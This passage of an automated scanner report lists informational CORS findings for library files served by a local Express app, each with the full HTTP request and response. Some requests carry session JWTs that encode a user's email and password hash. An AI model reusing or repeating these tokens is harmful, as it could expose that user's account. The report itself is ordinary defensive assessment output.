    ...[SNIP]...
    15.19. http://192.168.61.143:3000/bower_components/angular-bootstrap/ui-bootstrap.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/angular-bootstrap/ui-bootstrap.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/angular-bootstrap/ui-bootstrap.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 24 Sep 2016 04:17:49 GMT
    ETag: W/"189dd-1575a69d9c8"
    Content-Type: application/javascript
    Content-Length: 100829
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*
    * angular-ui-bootstrap
    * http://angular-ui.github.io/bootstrap/

    * Version: 2.1.4 - 2016-09-23
    * License: MIT
    */angular.module("ui.bootstrap",["ui.bootstrap.collapse","ui.bootstrap.tabindex","
    ...[SNIP]...
    15.20. http://192.168.61.143:3000/bower_components/angular-cookies/angular-cookies.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/angular-cookies/angular-cookies.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/angular-cookies/angular-cookies.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Fri, 16 Dec 2016 10:47:07 GMT
    ETag: W/"5a8-159073e17f8"
    Content-Type: application/javascript
    Content-Length: 1448
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*
    AngularJS v1.5.10
    (c) 2010-2016 Google, Inc. http://angularjs.org
    License: MIT
    */
    (function(n,c){'use strict';function l(b,a,g){var d=g.baseHref(),k=b[0];return function(b,e,f){var g,h;f=f||{};h
    ...[SNIP]...
    15.21. http://192.168.61.143:3000/bower_components/angular-qrcode/angular-qrcode.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/angular-qrcode/angular-qrcode.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/angular-qrcode/angular-qrcode.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 02 Apr 2016 10:19:01 GMT
    ETag: W/"1493-153d67ba608"
    Content-Type: application/javascript
    Content-Length: 5267
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*
    * angular-qrcode v6.2.1
    * (c) 2013 Monospaced http://monospaced.com
    * License: MIT
    */

    angular.module('monospaced.qrcode', [])
    .directive('qrcode', ['$window', function($window) {

    var ca
    ...[SNIP]...
    15.22. http://192.168.61.143:3000/bower_components/angular-route/angular-route.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/angular-route/angular-route.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/angular-route/angular-route.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Fri, 16 Dec 2016 10:47:08 GMT
    ETag: W/"12b2-159073e1be0"
    Content-Type: application/javascript
    Content-Length: 4786
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*
    AngularJS v1.5.10
    (c) 2010-2016 Google, Inc. http://angularjs.org
    License: MIT
    */
    (function(E,d){'use strict';function y(t,l,g){return{restrict:"ECA",terminal:!0,priority:400,transclude:"element
    ...[SNIP]...
    15.23. http://192.168.61.143:3000/bower_components/angular-socket-io/socket.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/angular-socket-io/socket.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/angular-socket-io/socket.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Mon, 08 Dec 2014 04:04:30 GMT
    ETag: W/"50b-14a2811e8b0"
    Content-Type: application/javascript
    Content-Length: 1291
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*
    * @license
    * angular-socket-io v0.7.0
    * (c) 2014 Brian Ford http://briantford.com
    * License: MIT
    */
    angular.module("btford.socket-io",[]).provider("socketFactory",function(){"use strict";var n
    ...[SNIP]...
    15.24. http://192.168.61.143:3000/bower_components/angular-touch/angular-touch.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/angular-touch/angular-touch.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/angular-touch/angular-touch.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Fri, 16 Dec 2016 10:47:08 GMT
    ETag: W/"fca-159073e1be0"
    Content-Type: application/javascript
    Content-Length: 4042
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*
    AngularJS v1.5.10
    (c) 2010-2016 Google, Inc. http://angularjs.org
    License: MIT
    */
    (function(x,n){'use strict';function s(f,k){var e=!1,a=!1;this.ngClickOverrideEnabled=function(b){return n.isDef
    ...[SNIP]...
    15.25. http://192.168.61.143:3000/bower_components/angular-translate-loader-static-files/angular-translate-loader-static-files.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/angular-translate-loader-static-files/angular-translate-loader-static-files.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/angular-translate-loader-static-files/angular-translate-loader-static-files.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Tue, 06 Dec 2016 18:57:00 GMT
    ETag: W/"55b-158d57f0060"
    Content-Type: application/javascript
    Content-Length: 1371
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*!
    * angular-translate - v2.13.1 - 2016-12-06
    *
    * Copyright (c) 2016 The angular-translate team, Pascal Precht; Licensed MIT
    */
    !function(a,b){"function"==typeof define&&define.amd?define([],fun
    ...[SNIP]...
    15.26. http://192.168.61.143:3000/bower_components/angular-translate/angular-translate.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/angular-translate/angular-translate.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/angular-translate/angular-translate.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Tue, 06 Dec 2016 18:56:59 GMT
    ETag: W/"5cb5-158d57efc78"
    Content-Type: application/javascript
    Content-Length: 23733
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*!
    * angular-translate - v2.13.1 - 2016-12-06
    *
    * Copyright (c) 2016 The angular-translate team, Pascal Precht; Licensed MIT
    */
    !function(a,b){"function"==typeof define&&define.amd?define([],fun
    ...[SNIP]...
    15.27. http://192.168.61.143:3000/bower_components/angular/angular.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/angular/angular.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/angular/angular.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Fri, 16 Dec 2016 10:47:07 GMT
    ETag: W/"27d70-159073e17f8"
    Content-Type: application/javascript
    Content-Length: 163184
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*
    AngularJS v1.5.10
    (c) 2010-2016 Google, Inc. http://angularjs.org
    License: MIT
    */
    (function(y){'use strict';function G(a,b){b=b||Error;return function(){var d=arguments[0],c;c="["+(a?a+":":"")+d
    ...[SNIP]...
    15.28. http://192.168.61.143:3000/bower_components/bootstrap/dist/js/bootstrap.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/bootstrap/dist/js/bootstrap.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/bootstrap/dist/js/bootstrap.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Mon, 25 Jul 2016 15:51:55 GMT
    ETag: W/"90b5-15622c16578"
    Content-Type: application/javascript
    Content-Length: 37045
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*!
    * Bootstrap v3.3.7 (http://getbootstrap.com)
    * Copyright 2011-2016 Twitter, Inc.
    * Licensed under the MIT license
    */
    if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requi
    ...[SNIP]...
    15.29. http://192.168.61.143:3000/bower_components/bootswatch/fonts/glyphicons-halflings-regular.woff2
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/bootswatch/fonts/glyphicons-halflings-regular.woff2

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/bootswatch/fonts/glyphicons-halflings-regular.woff2 HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: identity
    Referer: http://192.168.61.143:3000/bower_components/bootswatch/slate/bootstrap.min.css
    Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close
    If-Modified-Since: Sat, 30 Jul 2016 21:56:26 GMT
    If-None-Match: W/"466c-1563dceeb10"

    Response 1

    HTTP/1.1 304 Not Modified
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 30 Jul 2016 21:56:26 GMT
    ETag: W/"466c-1563dceeb10"
    Date: Sun, 15 Jan 2017 21:04:26 GMT
    Connection: close

    15.30. http://192.168.61.143:3000/bower_components/clipboard/dist/clipboard.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/clipboard/dist/clipboard.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/clipboard/dist/clipboard.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Mon, 12 Dec 2016 13:54:35 GMT
    ETag: W/"282e-158f3504978"
    Content-Type: application/javascript
    Content-Length: 10286
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*!
    * clipboard.js v1.5.16
    * https://zenorocha.github.io/clipboard.js
    *
    * Licensed MIT .. Zeno Rocha
    */
    !function(e){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=e();els
    ...[SNIP]...
    15.31. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/cn.svg
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/cn.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/cn.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"350-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 848
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" height="480" width="640" viewBox="0 0 640 480">
    <defs>
    <path id="a" fill="#ffde00" d="M-.588.81L0-1 .588.81-.95
    ...[SNIP]...
    15.32. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/de.svg
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/de.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/de.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"dc-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 220
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" height="480" width="640" viewBox="0 0 640 480">
    <path fill="#ffce00" d="M0 320h640v160.002H0z"/>
    <path d="M0 0h640v160H0z"/>
    <path fill="#d00" d="M0 160h6
    ...[SNIP]...
    15.33. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/ee.svg
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/ee.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/ee.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"144-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 324
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" height="480" width="640" viewBox="0 0 640 480">
    <g fill-rule="evenodd" stroke-width="1pt">
    <rect rx="0" ry="0" height="477.9" width="640"/>
    <rect rx="
    ...[SNIP]...
    15.34. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/es.svg
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/es.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/es.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
